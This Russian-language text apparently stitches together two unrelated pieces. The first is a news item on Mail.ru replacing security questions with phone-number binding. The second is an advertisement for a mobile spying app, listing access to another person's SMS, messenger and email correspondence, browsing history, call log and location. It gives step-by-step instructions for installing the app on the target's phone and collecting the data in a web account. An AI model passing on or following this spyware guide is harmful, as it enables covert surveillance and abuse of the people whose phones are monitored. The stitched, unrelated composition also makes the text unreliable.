Статистика Mail.ru: контрольные вопросы не помогают защите данных

4a2192dabd4a08cfe943c5dc2c2f5aa1

Представители Mail.ru работают над новой системой аутентификации для пользователей, в которой не останется места для ввода контрольных вопросов. Ранее неоднократно отмечалось, что этот метод защиты данных является самым ненадёжным. Хватит простейшей социальной инженерии для того, чтобы обойти такой барьер. Злоумышленники часто выходили на контакт с пользователями, втирались в доверии, а затем элементарно выпытывали нужные сведения. Потребовались знания человеческой психологии и коммуникации на начальном уровне.

Отныне всем новым юзерам системы Mail.ru не потребуется указывать секретный пароль, да и необходимость в этом практически отпала. Как показывает статистика, более 80% всех новых регистраций сопровождается привязкой мобильного телефона к аккаунту. Поэтому Mail.ru и приняли решение отказаться от подобной защиты. Также не придётся вводить вопрос и тем людям, которые ранее уже сумели выполнить привязку аккаунта к мобильнику. Это касается не только почтового клиента, но и всех прочих сервисов компании. Вполне ожидаемо, что это нововведение начнут использовать в Моём Мире и в Одноклассниках.

Эксперты по безопасности в Сети давно уверены в том, что ввод секретного вопроса не является панацеей от действий хакеров. Часто ответ подбирался и без непосредственного контакта с жертвой, а сам вопрос являлся для хакера прямой подсказкой. Злоумышленники могли внедрять в компьютер пользователя кейлоггер, который собирал бы всю информацию, вводимую с клавиатуры. Аналогичную слежку мог выполнять и троян, особенно если антивирусного ПО на машине не было.

Не всегда (и не у всех клиентов) есть возможность быстрого обращения к мобильному телефону. Что делать в этой ситуации? Администрация Mail.ru советует сразу писать в службу технической поддержки, которая задаст клиенту несколько вопросов. В случае правильного ответа доступ будет восстановлен. В ряде случаев могут запросить и личные паспортные данные, а в будущем не исключается необходимость ввода такой информации уже в процессе регистрации. При этом гарантируется конфиденциальность всех собираемых сведений, надёжная защита от считывания посторонними лицами и т.д.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.